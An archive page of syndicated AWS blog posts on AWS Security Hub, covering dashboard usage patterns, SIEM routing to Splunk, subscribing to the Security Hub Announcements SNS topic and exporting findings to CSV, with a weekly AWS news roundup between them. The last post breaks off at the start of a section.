Tag Archives: AWS Security Hub

Three recurring Security Hub usage patterns and how to deploy them

Post Syndicated from Tim Holm original https://aws.amazon.com/blogs/security/three-recurring-security-hub-usage-patterns-and-how-to-deploy-them/

As Amazon Web Services (AWS) Security Solutions Architects, we get to talk to customers of all sizes and industries about how they want to improve their security posture and get visibility into their AWS resources. This blog post identifies the top three most commonly used Security Hub usage patterns and describes how you can use these to improve your strategy for identifying and managing findings.

Customers have told us they want to provide security and compliance visibility to the application owners in an AWS account or to the teams that use the account; others want a single-pane-of-glass view for their security teams; and other customers want to centralize everything into a security information and event management (SIEM) system, most often due to being in a hybrid scenario.

Security Hub was launched as a posture management service that performs security checks, aggregates alerts, and enables automated remediation. Security Hub ingests findings from multiple AWS services, including Amazon GuardDuty, Amazon Inspector, AWS Firewall Manager, and AWS Health, and also from third-party services. It can be integrated with AWS Organizations to provide a single dashboard where you can view findings across your organization.

Security Hub findings are normalized into the AWS Security Findings Format (ASFF) so that users can review them in a standardized format. This reduces the need for time-consuming data conversion efforts and allows for flexible and consistent filtering of findings based on the attributes provided in the finding, as well as the use of customizable responsive actions. Partners who have integrations with Security Hub also send their findings to AWS using the ASFF to allow for consistent attribute definition and enforced criticality ratings, meaning that findings in Security Hub have a measurable rating. This helps to simplify the complexity of managing multiple findings from different providers.

Overview of the usage patterns

In this section, we outline the objectives for each usage pattern, list the typical stakeholders we have seen these patterns support, and discuss the value of deploying each one.

Usage pattern 1: Dashboard for application owners

Use Security Hub to provide visibility to application workload owners regarding the security and compliance posture of their AWS resources.

The application owner is often responsible for the security and compliance posture of the resources they have deployed in AWS. In our experience however, it is common for large enterprises to have a separate team responsible for defining security-related privileges and to not grant application owners the ability to modify configuration settings on the AWS account that is designated as the centralized Security Hub administration account. We’ll walk through how you can enable read-only access for application owners to use Security Hub to see the overall security posture of their AWS resources.

Stakeholders: Developers and cloud teams that are responsible for the security posture of their AWS resources. These individuals are often required to resolve security events and non-compliance findings that are captured with Security Hub.

Value adds for customers: Some organizations we have worked with put the onus on workload owners to own their security findings, because they have a better understanding of the nuances of the engineering, the business needs, and the overall risk that the security findings represent. This usage pattern gives the applications owners clear visibility into the security and compliance status of their workloads in the AWS accounts so that they can define appropriate mitigation actions with consideration to their business needs and risk.

Usage pattern 2: A single pane of glass for security professionals

Use Security Hub as a single pane of glass to view, triage, and take action on AWS security and compliance findings across accounts and AWS Regions.

Security Hub generates findings by running continuous, automated security checks based on supported industry standards. Additionally, Security Hub integrates with other AWS services to collect and correlate findings and uses over 60 partner integrations to simplify and prioritize findings. With these features, security professionals can use Security Hub to manage findings across their AWS landscape.

Stakeholders: Security operations, incident responders, and threat hunters who are responsible for monitoring compliance, as well as security events.

Value adds for customers: This pattern benefits customers who don’t have a SIEM but who are looking for a centralized model of security operations. By using Security Hub and aggregating findings across Regions into a single Security Hub dashboard, they get oversight of their AWS resources without the cost and complexity of managing a SIEM.

Usage pattern 3: Centralized routing to a SIEM solution

Use AWS Security Hub as a single aggregation point for security and compliance findings across AWS accounts and Regions, and route those findings in a normalized format to a centralized SIEM or log management tool.

Customers who have an existing SIEM capability and complex environments typically deploy this usage pattern. By using Security Hub, these customers gather security and compliance-related findings across the workloads in all their accounts, ingest those into their SIEM, and investigate findings or take response and remediation actions directly within their SIEM console. This mechanism also enables customers to define use cases for threat detection and analysis in a single environment, providing a holistic view of their risk.

Stakeholders: Security operations teams, incident responders, and threat hunters. This pattern supports a centralized model of security operations, where the responsibilities for monitoring and identifying both non-compliance with defined practice, as well as security events, fall within single teams within the organization.

Value adds for customers: When Security Hub aggregates the findings from workloads across accounts and Regions in a single place, those finding are normalized by using the ASFF. This means that findings are already normalized under a single format when they are sent to the SIEM. This enables faster analytics, use case definition, and dashboarding because analysts don’t have to create multi-tiered use cases for different finding structures across vendors and services.

The ASFF also enables streamlined response through security orchestration, automation, response (SOAR) tools or AWS native orchestration tools such as AWS EventBridge. With the ASFF, you can effortlessly parse and filter events based on an attribute and customize automation.

Overall, this usage pattern helps to improve the typical key performance indicators (KPIs) the SecOps function is measured against, such as Mean Time to Detect (MTTD) or Mean Time to Respond (MTTR) in the AWS environment.

Setting up each usage pattern

In this section, we’ll go over the steps for setting up each usage pattern

Usage pattern 1: Dashboard for application owners

Use the following steps to set up a Security Hub dashboard for an account owner, where the owner can view and take action on security findings.

Prerequisites for pattern 1

This solution has the following prerequisites:

  1. Enable AWS Security Hub to check your environment against security industry standards and best practices.
  2. Next, enable the AWS service integrations for all accounts and Regions as desired. For more information, refer to Enabling all features in your organization.

Set up read-only permissions for the AWS application owner

The following steps are commonly performed by the security team or those responsible for creating AWS Identity and Access Management (IAM) policies.

  • Assign the AWS managed permission policy AWSSecurityHubReadOnlyAccess to the principal who will be assuming the role. Figure 1 shows an image of the permission statement.
    Figure 1: Assign permissions

    Figure 1: Assign permissions

  • (Optional) Create custom insights in Security Hub. Using custom insights can provide a view of areas of interest for an application owner; however, creating a new insights view is not allowed unless the following additional set of permissions are granted to the application owner role or user.
    {
    "Effect": "Allow",
    "Action": [
    "securityhub:UpdateInsight",
    "securityhub:DeleteInsight",
    "securityhub:CreateInsight"
    ],
    "Resource": "*"
    }

Pattern 1 walkthrough: View the application owner’s security findings

After the read-only IAM policy has been created and applied, the application owner can access Security Hub to view the dashboard, which provides the application owner with a view of the overall security posture of their AWS resources. In this section, we’ll walk through the steps that the application owner can take to quickly view and assess the compliance and security of their AWS resources.

To view the application owner’s dashboard in Security Hub

  1. Sign into the AWS Management Console and navigate to the AWS Security Hub service page. You will be presented with a summary of the findings. Then, depending on the security standards that are enabled, you will be presented with a view similar to the one shown in Figure 2.
    Figure 2: Summary of aggregated Security Hub standard score

    Figure 2: Summary of aggregated Security Hub standard score

    Security Hub generates its own findings by running automated and continuous checks against the rules in a set of supported security standards. On the Summary page, the Security standards card displays the security scores for each enabled standard. It also displays a consolidated security score that represents the proportion of passed controls to enabled controls across the enabled standards.

  2. Choose the hyperlink of a security standard to get an additional summarized view, as shown in Figure 3.
    Figure 3: Security Hubs standards summarized view

    Figure 3: Security Hubs standards summarized view

  3. As you choose the hyperlinks for the specific findings, you will get additional details, along with recommended remediation instructions to take.
    Figure 4: Example of finding details view

    Figure 4: Example of finding details view

  4. In the left menu of the Security Hub console, choose Findings to see the findings ranked according to severity. Choose the link text of the finding title to drill into the details and view additional information on possible remediation actions.
    Figure 5: Findings example

    Figure 5: Findings example

  5. In the left menu of the Security Hub console, choose Insights. You will be presented with a collection of related findings. Security Hub provides several managed insights to get you started with assessing your security posture. As shown in Figure 6, you can quickly see if your Amazon Simple Storage Service (Amazon S3) buckets have public write or read permissions. This is just one example of managed insights that help you quickly identify risks.
    Figure 6: Insights view

    Figure 6: Insights view

  6. You can create custom insights to track issues and resources that are specific to your environment. Note that creating custom insights requires IAM permissions, as described earlier in the Prerequisites for Pattern 1 section. Use the following steps to create a custom insight for compliance status.

    To create a custom insight, use the Group By filter and select how you want your insights to be grouped together:

    1. In the left menu of the Security Hub console, choose Insights, and then choose Create insight in the upper right corner.
    2. By default, there will be filters included in the filter bar. Put the cursor in the filter bar, choose Group By, choose Compliance Status, and then choose Apply.
      Figure 7: Creating a custom insight

      Figure 7: Creating a custom insight

    3. For Insight name, enter a relevant name for your insight, and then choose Create insight. Your custom insight will be created.

In this scenario, you learned how application owners can quickly assess the resources in an AWS account and get details about security risks and recommended remediation steps. For a more hands-on walkthrough that covers how to use Security Hub, consider spending 2–3 hours going through this AWS Security Hub workshop.

Usage pattern 2: A single pane of glass for security professionals

To use Security Hub as a centralized source of security insight, we recommend that you choose to accept security data from the available integrated AWS services and third-party products that generate findings. Check the lists of available integrations often, because AWS continues to release new services that integrate with Security Hub. Figure 8 shows the Integrations page in Security Hub, where you can find information on how to accept findings from the many integrations that are available.

Figure 8: Security Hub integrations page

Figure 8: Security Hub integrations page

Solution architecture and workflow for pattern 2

As Figure 9 shows, you can visualize Security Hub as the centralized security dashboard. Here, Security Hub can act as both the consumer and issuer of findings. Additionally, if you have security findings you want sent to Security Hub that aren’t provided by a AWS Partner or AWS service, you can create a custom provider to provide the central visibility you need.

Figure 9: Security Hub findings flow

Figure 9: Security Hub findings flow

Because Security Hub is integrated with many AWS services and partner solutions, customers get improved security visibility across their AWS landscape. With the integration of Amazon Detective, it’s convenient for security analysts to use Security Hub as the centralized incident triage starting point. Amazon Detective is a security incident response service that can be used to analyze, investigate, and quickly identify the root cause of potential security issues or suspicious activities by collecting log data from AWS resources. To learn how to get started with Amazon Detective, we recommend watching this video.

Programmatically remediate high-volume workflows

Security teams increasingly rely on monitoring and automation to scale and keep up with the demands of their business. Using Security Hub, customers can configure automatic responses to findings based upon preconfigured rules. Security Hub gives you the option to create your own automated response and remediation solution or use the AWS provided solution, Security Hub Automated Response and Remediation (SHARR). SHARR is an extensible solution that provides predefined response and remediation actions (playbooks) based on industry compliance standards and best practices for security threats. For step-by-step instructions for setting up SHARR, refer to this blog post.

Routing to alerting and ticketing systems

For incidents you cannot or do not want to automatically remediate, either because the incident happened in an account with a production workload or some change control process must be followed, routing to an incident management environment may be necessary. The primary goal of incident response is reducing the time to resolution for critical incidents. Customers who use alerting or incident management systems can integrate Security Hub to streamline the time it takes to resolve incidents. ServiceNow ITSM, Slack and PagerDuty are examples of products that integrate with Security Hub. This allows for workflow processing, escalations, and notifications as required.

Additionally, Incident Manager, a capability of AWS Systems Manager, also provides response plans, an escalation path, runbook automation, and active collaboration to recover from incidents. By using runbooks, customers can set up and run automation to recover from incidents. This blog post walks through setting up runbooks.

Usage pattern 3: Centralized routing to a SIEM solution

Here, we will describe how to use Splunk as an AWS Partner SIEM solution. However, note that there are many other SIEM partners available in the marketplace; the instructions to route findings to those partners’ platforms will be available in their documentation.

Solution architecture and workflow for pattern 3

Figure 10: Security Hub findings ingestion to Splunk

Figure 10: Security Hub findings ingestion to Splunk

Figure 10 shows the use of a Security Hub delegated administrator that aggregates findings across multiple accounts and Regions, as well as other AWS services such as GuardDuty, Amazon Macie, and Inspector. These findings are then sent to Splunk through a combination of Amazon EventBridge, AWS Lambda, and Amazon Kinesis Data Firehose.

Prerequisites for pattern 3

This solution has the following prerequisites:

  • Enable Security Hub in your accounts, with one account defined as the delegated admin for other accounts within AWS Organizations, and enable cross-Region aggregation.
  • Set up third-party SIEM solution; you can visit the AWS marketplace for a list of our SIEM partners. For this walkthrough, we will be using Splunk, with the Security Hub app in Splunk and an HTTP Event Collector (HEC) with indexer acknowledgment configured.
  • Generate and deploy a CloudFormation template from Splunk’s automation, provided by Project Trumpet.
  • Enable cross-Region replication. This action can only be performed from within the delegated administrator account, or from within a standalone account that is not controlled by a delegated administrator. The aggregation Region must be a Region that is enabled by default.

Pattern 3 walkthrough: Set up centralized routing to a SIEM

To get started, first designate a Security Hub delegated administrator and configure cross-Region replication. Then you can configure integration with Splunk.

To designate a delegated administrator and configure cross-Region replication

  1. Follow the steps in Designating a Security Hub administrator account to configure the delegated administrator for Security Hub.
  2. Perform these steps to configure cross-Region replication:
    1. Sign in to the account to which you delegated Security Hub administration, and in the console, navigate to the Security Hub dashboard in your desired aggregation Region. You must have the correct permissions to access Security Hub and make this change.
    2. Choose Settings, choose Regions, and then choose Configure finding aggregation.
    3. Select the radio button that displays the Region you are currently in, and then choose Save.
    4. You will then be presented with all available Regions in which you can aggregate findings. Select the Regions you want to be part of the aggregation. You also have the option to automatically link future Regions that Security Hub becomes enabled in.
    5. Choose Save.

You have now enabled multi-Region aggregation. Navigate back to the dashboard, where findings will start to be replicated into a single view. The time it takes to replicate the findings from the Regions will vary. We recommend waiting 24 hours for the findings to be replicated into your aggregation Region.

To configure integration with Splunk

Note: These actions require that you have appropriate permissions to deploy a CloudFormation template.

  1. Navigate to https://splunktrumpet.github.io/ and enter your HEC details: the endpoint URL and HEC token. Leave Automatically generate the required HTTP Event Collector tokens on your Splunk environment unselected.
  2. Under AWS data source configuration, select only AWS CloudWatch Events, with the Security Hub findings – Imported filter applied.
  3. Download the CloudFormation template to your local machine.
  4. Sign in to the AWS Management Console in the account and Region where your Security Hub delegated administrator and Region aggregation are configured.
  5. Navigate to the CloudFormation console and choose Create stack.
  6. Choose Template is ready, and then choose Upload a template file. Upload the CloudFormation template you previously downloaded from the Splunk Trumpet page.
  7. In the CloudFormation console, on the Specify Details page, enter a name for the stack. Keep all the default settings, and then choose Next.
  8. Keep all the default settings for the stack options, and then choose Next to review.
  9. On the review page, scroll to the bottom of the page. Select the check box under the Capabilities section, next to the acknowledgment that AWS CloudFormation might create IAM resources with custom names.

    The CloudFormation template will take approximately 15–20 minutes to complete.

Test the solution for pattern 3

If you have GuardDuty enabled in your account, you can generate sample findings. Security Hub will ingest these findings and invoke the EventBridge rule to push them into Splunk. Alternatively, you can wait for findings to be generated from the periodic checks that are performed by Security Hub. Figure 11 shows an example of findings displayed in the Security Hub dashboard in Splunk.

Figure 11: Example of the Security Hub dashboard in Splunk

Figure 11: Example of the Security Hub dashboard in Splunk

Conclusion

AWS Security Hub provides multiple ways you can use to quickly assess and prioritize your security alerts and security posture. In this post, you learned about three different usage patterns that we have seen our customers implement to take advantage of the benefits and integrations offered by Security Hub. Note that these usage patterns are not mutually exclusive, but can be used together as needed.

To extend these solutions further, you can enrich Security Hub metadata with additional context by using tags, as described in this post. Configure Security Hub to ingest findings from a variety of AWS Partners to provide additional visibility and context to the overall status of your security posture. To start your 30-day free trial of Security Hub, visit AWS Security Hub.

If you have feedback about this blog post, submit comments in the Comments section below. If you have questions about this blog post, please start a new thread on the Security Hub forum or contact AWS Support.

Want more AWS Security news? Follow us on Twitter.

Tim Holm

Tim Holm

Tim is a Principal Solutions Architect at AWS, he joined AWS in 2018 and is deeply passionate about security, cloud services, and building innovative solutions that solve complex business problems.

Danny Cortegaca

Danny Cortegaca

Danny is a Senior Security Specialist at AWS. He joined AWS in 2021 and specializes in security architecture, threat modelling, and driving risk focused conversations.

AWS Week in Review – September 5, 2022

Post Syndicated from Danilo Poccia original https://aws.amazon.com/blogs/aws/aws-week-in-review-september-5-2022/

This post is part of our Week in Review series. Check back each week for a quick roundup of interesting news and announcements from AWS!

As a new week begins, let’s quickly look back at the most significant AWS news from the previous seven days.

Last Week’s Launches
Here are the launches that got my attention last week:

AWS announces open-sourced credentials-fetcher to simplify Microsoft AD access from Linux containers. You can find more in the What’s New post.

AWS Step Functions now has 14 new intrinsic functions that help you process data more efficiently and make it easier to perform data processing tasks such as array manipulation, JSON object manipulation, and math functions within your workflows without having to invoke downstream services or add Task states.

AWS SAM CLI esbuild support is now generally available. You can now use esbuild in the SAM CLI build workflow for your JavaScript applications.

Amazon QuickSight launches a new user interface for dataset management that replaces the existing popup dialog modal with a full-page experience, providing a clearer breakdown of dataset management categories.

AWS GameKit adds Unity support. With this release for Unity, you can integrate cloud-based game features into Win64, MacOS, Android, or iOS games from both the Unreal and Unity engines with just a few clicks.

AWS and VMware announce VMware Cloud on AWS integration with Amazon FSx for NetApp ONTAP. Read more in Veliswa‘s blog post.

The AWS Region in the United Arab Emirates (UAE) is now open. More info in Marcia‘s blog post.

View of Abu Dhabi in the United Arab Emirates

For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Other AWS News
A few more blog posts you might have missed:

Easy analytics and cost-optimization with Amazon Redshift Serverless – Four different use cases of Redshift Serverless are discussed in this post.

Building cost-effective AWS Step Functions workflows – In this blog post, Ben explains the difference between Standard and Express Workflows, including costs, migrating from Standard to Express, and some interesting ways of using both together.

How to subscribe to the new Security Hub Announcements topic for Amazon SNS – You can now receive updates about new Security Hub services and features, newly supported standards and controls, and other Security Hub changes.

Deploying AWS Lambda functions using AWS Controllers for Kubernetes (ACK) – With the ACK service controller for AWS Lambda, you can provision and manage Lambda functions with kubectl and custom resources.

For AWS open-source news and updates, here’s the latest newsletter curated by Ricardo to bring you the most recent updates on open-source projects, posts, events, and more.

Upcoming AWS Events
Depending on where you are on this planet, there are many opportunities to meet and learn:

AWS Summits – Come together to connect, collaborate, and learn about AWS. Registration is open for the following in-person AWS Summits: Ottawa (September 8), New Delhi (September 9), Mexico City (September 21–22), Bogotá (October 4), and Singapore (October 6).

AWS Community DaysAWS Community Day events are community-led conferences to share and learn with one another. In September, the AWS community in the US will run events in the Bay Area, California (September 9) and Arlington, Virginia (September 30). In Europe, Community Day events will be held in October. Join us in Amersfoort, Netherlands (October 3), Warsaw, Poland (October 14), and Dresden, Germany (October 19).

That’s all from me for this week. Come back next Monday for another Week in Review!

Danilo

How to subscribe to the new Security Hub Announcements topic for Amazon SNS

Post Syndicated from Mike Saintcross original https://aws.amazon.com/blogs/security/how-to-subscribe-to-the-new-security-hub-announcements-topic-for-amazon-sns/

With AWS Security Hub you are able to manage your security posture in AWS, perform security best practice checks, aggregate alerts, and automate remediation. Now you are able to use Amazon Simple Notification Service (Amazon SNS) to subscribe to the new Security Hub Announcements topic to receive updates about new Security Hub services and features, newly supported standards and controls, and other Security Hub changes.

Introducing the Security Hub Announcements topic

Amazon SNS follows the publish/subscribe (pub/sub) messaging model, in which notifications are delivered to you by using a push mechanism that eliminates the need for you to periodically check or poll for new information and updates. You can now use this push mechanism to receive notifications about Security Hub by subscribing to the dedicated Security Hub Announcements topic.

The Security Hub Announcements topic publishes the following types of notifications:

  • General notifications
  • Upcoming standards and controls
  • New AWS Regions supported
  • New standards and controls
  • Updated standards and controls
  • Retired standards and controls
  • Updates to the AWS Security Finding Format (ASFF)
  • New integrations
  • New features
  • Changes to existing features

How to use the Security Hub Announcements topic

You can subscribe to the SNS topic for Security Hub Announcements to receive notification messages about newly released finding types, updates to the existing finding types, and other functionality changes. By subscribing to the SNS topic, you will receive Security Hub Announcements messages as soon as they are published. The notifications are available in all protocols that Amazon SNS supports, such as email and SMS. For more information about supported protocols in Amazon SNS, see Subscribing to an Amazon SNS topic.

The Security Hub Announcements topic is available in all AWS Regions in the aws and aws-cn partitions, but is not yet available in the AWS GovCloud (US) Regions (the aws-us-gov partition). Later in this post, we’ll show you how to subscribe to the Security Hub Announcements topic in a specific AWS Region by using the topic Amazon Resource Name (ARN) for that Region. The SNS topic messages are the same across Regions in a partition, so you can choose to subscribe to only one Region in a partition to avoid receiving duplicate information.

However, if you want to invoke an AWS Lambda function in reaction to a Security Hub Announcements message, you must subscribe to the topic ARN that is in the same Region as the Lambda function. The Lambda function can receive the SNS topic message payload as an input parameter and manipulate the information in the message, publish the message to other SNS topics, or send the message to other AWS services. For more information, see Subscribing a function to a topic in the Amazon SNS Developer Guide.

The same is true if you want to subscribe an Amazon Simple Queue Service (Amazon SQS) queue to the Security Hub Announcements topic, you must use a topic ARN that is in the same Region as the SQS queue. The SQS queue can be used to persist announcement SNS topic messages in the queue for other applications to process at a later time. For more information, see Subscribing an Amazon SQS queue to an Amazon SNS topic in the Amazon SQS Developer Guide.

IAM permissions

Your user account must have sns::subscribe AWS Identity and Access Management (IAM) permissions to subscribe to an SNS topic. For more information on IAM permissions for Amazon SNS, see Using identity-based policies with Amazon SNS.

Subscribe to the Security Hub Announcements topic

The following is the list of Security Hub Announcements topic ARNs for each currently supported Region. The examples in this post use the US West (Oregon) Region (us-west-2), but you can update the procedures with one of the following ARNs to use a different supported Region.

Security Hub Announcements topic ARNs by Region

arn:aws:sns:us-east-1:088139225913:SecurityHubAnnouncements
arn:aws:sns:us-east-2:291342846459:SecurityHubAnnouncements
arn:aws:sns:us-west-1:137690824926:SecurityHubAnnouncements
arn:aws:sns:us-west-2:393883065485:SecurityHubAnnouncements
arn:aws:sns:eu-central-1:871975303681:SecurityHubAnnouncements
arn:aws:sns:eu-north-1:191971010772:SecurityHubAnnouncements
arn:aws:sns:eu-south-1:151363035580:SecurityHubAnnouncements
arn:aws:sns:eu-west-1:705756202095:SecurityHubAnnouncements
arn:aws:sns:eu-west-2:883600840440:SecurityHubAnnouncements
arn:aws:sns:eu-west-3:313420042571:SecurityHubAnnouncements
arn:aws:sns:ca-central-1:137749997395:SecurityHubAnnouncements
arn:aws:sns:sa-east-1:359811883282:SecurityHubAnnouncements
arn:aws:sns:me-south-1:585146626860:SecurityHubAnnouncements
arn:aws:sns:af-south-1:463142546776:SecurityHubAnnouncements
arn:aws:sns:ap-northeast-1:592469075483:SecurityHubAnnouncements
arn:aws:sns:ap-northeast-2:374299265323:SecurityHubAnnouncements
arn:aws:sns:ap-northeast-3:633550238216:SecurityHubAnnouncements
arn:aws:sns:ap-southeast-1:512267288502:SecurityHubAnnouncements
arn:aws:sns:ap-southeast-2:475730049140:SecurityHubAnnouncements
arn:aws:sns:ap-southeast-3:627843640627:SecurityHubAnnouncements
arn:aws:sns:ap-east-1:464812404305:SecurityHubAnnouncements
arn:aws:sns:ap-south-1:707356269775:SecurityHubAnnouncements
arn:aws-cn:sns:cn-north-1:672341567257:SecurityHubAnnouncements
arn:aws-cn:sns:cn-northwest-1:672534482217:SecurityHubAnnouncements

The two procedures that follow show you how to subscribe an email address to the Security Hub Announcements topic by using the AWS Management Console and the AWS CLI.

To subscribe an email address to the Security Hub Announcements topic (console)

  1. Sign in to the Amazon SNS console.
  2. In the Region list, choose the same Region as the topic ARN to which you want to subscribe. This example uses the us-west-2 Region.
  3. In the left navigation pane, choose Subscriptions, then choose Create subscription.
  4. In the Create subscription dialog box, do the following:
    • For Topic ARN, paste the following topic ARN for the us-west-2 Region, or use one of the ARNs listed above for a different supported Region:

      arn:aws:sns:us-west-2:393883065485:SecurityHubAnnouncements

    • For Protocol, choose Email.
    • For Endpoint, enter an email address that you can use to receive the notification.
  5. Choose Create subscription.
  6. In your email application, open the message from AWS Notifications and open the link to confirm your subscription. Your web browser displays a confirmation response from Amazon SNS, similar to that shown in Figure 1.

    Figure 1: SNS notification subscription confirmation

    Figure 1: SNS notification subscription confirmation

The following steps show you how to subscribe an email address to the Security Hub Announcements topic by using the AWS Command Line Interface (AWS CLI).

To subscribe an email address to the Security Hub Announcements topic (AWS CLI)

  1. Run the following command in the AWS CLI, replacing <[email protected]> with your email address, and optionally replacing the ARN and reference to us-west-2 if you want to use a different Region:
    aws sns --region us-west-2 subscribe --topic-arn arn:aws:sns:us-west-2:393883065485:SecurityHubAnnouncements --protocol email --notification-endpoint <[email protected]>
  2. In your email application, open the message from AWS Notifications and open the link to confirm your subscription.
  3. Your web browser displays a confirmation response from Amazon SNS, similar to that shown in Figure 1.

Example subscription responses

The following sections contain examples of a message announcing new standard controls supported by Security Hub in email and sqs protocol types.

Example message from an email subscription (protocol type: email)

{"AnnouncementType":"NEW_STANDARDS_CONTROLS", “Title”:”[New Controls] 36 new Security Hub controls added to the AWS Foundational Security Best Practices standard”, "Description":"We have added 36 new controls to the AWS Foundational Security Best Practices standard. These include controls for Amazon Auto Scaling (AutoScaling.3, AutoScaling.4, AutoScaling.6), AWS CloudFormation (CloudFormation.1), Amazon CloudFront (CloudFront.10), Amazon Elastic Compute Cloud (Amazon EC2) (EC2.23, EC2.24, EC2.27), Amazon Elastic Container Registry (Amazon ECR) (ECR.1, ECR.2), Amazon Elastic Container Service (Amazon ECS) (ECS.3, ECS.4, ECS.5, ECS.8, ECS.10, ECS.12), Amazon Elastic File System (Amazon EFS) (EFS.3, EFS.4), Amazon Elastic Kubernetes Service (Amazon EKS) (EKS.2), Elastic Load Balancing (ELB.12, ELB.13, ELB.14), Amazon Kinesis (Kinesis.1), AWS Network Firewall (NetworkFirewall.3, NetworkFirewall.4, NetworkFirewall.5), Amazon OpenSearch Service (Opensearch.7), Amazon Redshift (Redshift.9), Amazon Simple Storage Service (Amazon S3) (S3.13), Amazon Simple Notification Service (SNS.2), AWF WAF (WAF.2, WAF.3, WAF.4, WAF.6, WAF.7, WAF.8). If you enabled the AWS Foundational Security Best Practices standard in an account and configured Security Hub to automatically enable new controls, these controls are enabled by default. Availability of controls can vary by Region."}

Example message from an SQS queue subscription (protocol type: sqs)

The following message shows the additional metadata included with an SQS subscription to the Security Hub Announcements topic. For more information about the metadata included in an SNS topic message delivered to an SQS queue, see Fanout to Amazon SQS Queues.

{
  "Type" : "Notification",
  "MessageId" : "c9c03e46-69df-5c3c-84e9-6520708ac394",
  "TopicArn" : "arn:aws:sns:us-west-2:393883065485:SecurityHubAnnouncements",
  "Message" : "{\"AnnouncementType\":\"NEW_STANDARDS_CONTROLS\",\"Title\":\"[New Controls] 36 new Security Hub controls added to the AWS Foundational Security Best Practices standard\",\"Description\":\"We have added 36 new controls to the AWS Foundational Security Best Practices standard. These include controls for Amazon Auto Scaling (AutoScaling.3, AutoScaling.4, AutoScaling.6), AWS CloudFormation (CloudFormation.1), Amazon CloudFront (CloudFront.10), Amazon Elastic Compute Cloud (Amazon EC2) (EC2.23, EC2.24, EC2.27), Amazon Elastic Container Registry (Amazon ECR) (ECR.1, ECR.2), Amazon Elastic Container Service (Amazon ECS) (ECS.3, ECS.4, ECS.5, ECS.8, ECS.10, ECS.12), Amazon Elastic File System (Amazon EFS) (EFS.3, EFS.4), Amazon Elastic Kubernetes Service (Amazon EKS) (EKS.2), Elastic Load Balancing (ELB.12, ELB.13, ELB.14), Amazon Kinesis (Kinesis.1), AWS Network Firewall (NetworkFirewall.3, NetworkFirewall.4, NetworkFirewall.5), Amazon OpenSearch Service (Opensearch.7), Amazon Redshift (Redshift.9), Amazon Simple Storage Service (Amazon S3) (S3.13), Amazon Simple Notification Service (SNS.2), AWF WAF (WAF.2, WAF.3, WAF.4, WAF.6, WAF.7, WAF.8). If you enabled the AWS Foundational Security Best Practices standard in an account and configured Security Hub to automatically enable new controls, these controls are enabled by default. Availability of controls can vary by Region. \"}",
  "Timestamp" : "2022-08-04T18:59:33.319Z",
  "SignatureVersion" : "1",
  "Signature" : "GdKokPEUexpKZn5da5u/p5eZF1cE3JUyL0uPVKmPnDzd3orkk5jJ211VsOflUFi6V9lSXF/V6RBpQN/9f3+JBFBprng7BRQwT9I4jSa1xOn1L3xKXEVGvWI6nl1oDqBl21Pj3owV+NZ+Exd2W0dpgg8B1LG4bYq5T73MjHjWGtelcBa15TpIz/+rynqanXCKCvc/50V/XZLjA5M7gU6Dzs9CULIjkdEpCsw5FvSxbtkEd6Ktx4LH7Zq6FlPKNli3EaEHRKh9uYPo6sR/yvF4RWg3E9O4dVsK7A8uTdR+pwVCU1M601KMRxO1OWF8VIdvyPINJND8Nu/70GRA2L+MRA==",
  "SigningCertURL" : "https://sns.us-west-2.amazonaws.com/SimpleNotificationService-56e67fcb41f6fec09b0196692625d385.pem",
  "UnsubscribeURL" : "https://sns.us-west-2.amazonaws.com/?Action=Unsubscribe&SubscriptionArn=arn:aws:sns:us-west-2:393883065485:SecurityHubAnnouncements:1eb29a83-8726-4366-891c-293ad5e35a53"
}

Note: You need to set up the SQS access policy in order for SNS to push message to the SNS queue. For more information, see Basic examples of Amazon SQS policies.

Available now

The SNS topic for Security Hub Announcements is available today in the Regions described in this post. Subscribe now to stay informed of Security Hub updates. With Amazon SNS, there is no minimum fee, and you pay only for what you use. For more information, see the Amazon SNS pricing page.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support. You can also start a new thread on AWS Security Hub re:Post to get answers from the community.

Want more AWS Security news? Follow us on Twitter.

Mike Saintcross

Mike Saintcross

Mike Saintcross is a Security Consultant at AWS helping enterprise customers achieve their cloud security goals in an ever-changing threat landscape. His background is in Security Engineering with a focus on deep packet inspection, incident response, security orchestration, and automation.

Neha Joshi

Neha Joshi

Neha Joshi is a Senior Solutions Architect at AWS. She loves to brainstorm and develop solutions to help customers be successful on AWS. Outside of work, she enjoys hiking and audio books.

How to export AWS Security Hub findings to CSV format

Post Syndicated from Andy Robinson original https://aws.amazon.com/blogs/security/how-to-export-aws-security-hub-findings-to-csv-format/

AWS Security Hub is a central dashboard for security, risk management, and compliance findings from AWS Audit Manager, AWS Firewall Manager, Amazon GuardDuty, IAM Access Analyzer, Amazon Inspector, and many other AWS and third-party services. You can use the insights from Security Hub to get an understanding of your compliance posture across multiple AWS accounts. It is not unusual for a single AWS account to have more than a thousand Security Hub findings. Multi-account and multi-Region environments may have tens or hundreds of thousands of findings. With so many findings, it is important for you to get a summary of the most important ones. Navigating through duplicate findings, false positives, and benign positives can take time.

In this post, we demonstrate how to export those findings to comma separated values (CSV) formatted files in an Amazon Simple Storage Service (Amazon S3) bucket. You can analyze those files by using a spreadsheet, database applications, or other tools. You can use the CSV formatted files to change a set of status and workflow values to align with your organizational requirements, and update many or all findings at once in Security Hub.

The solution described in this post, called CSV Manager for Security Hub, uses an AWS Lambda function to export findings to a CSV object in an S3 bucket, and another Lambda function to update Security Hub findings by modifying selected values in the downloaded CSV file from an S3 bucket. You use an Amazon EventBridge scheduled rule to perform periodic exports (for example, once a week). CSV Manager for Security Hub also has an update function that allows you to update the workflow, customer-specific notation, and other customer-updatable values for many or all findings at once. If you’ve set up a Region aggregator in Security Hub, you should configure the primary CSV Manager for Security Hub stack to export findings only from the aggregator Region. However, you may configure other CSV Manager for Security Hub stacks that export findings from specific Regions or from all applicable Regions in specific accounts. This allows application and account owners to view their own Security Hub findings without having access to other findings for the organization.

How it works

CSV Manager for Security Hub has two main features:

  • Export Security Hub findings to a CSV object in an S3 bucket
  • Update Security Hub findings from a CSV object in an S3 bucket

Overview of the export function

The overview of the export function CsvExporter is shown in Figure 1.

Figure 1: Architecture diagram of the export function

Figure 1: Architecture diagram of the export function

Figure 1 shows the following numbered steps:

  1. In the AWS Management Console, you invoke the CsvExporter Lambda function with a test event.
  2. The export function calls the Security Hub GetFindings API action and gets a list of findings to export from Security Hub.
  3. The export function converts the most important fields to identify and sort findings to a 37-column CSV format (which includes 12 updatable columns) and writes to an S3 bucket.

Overview of the update function

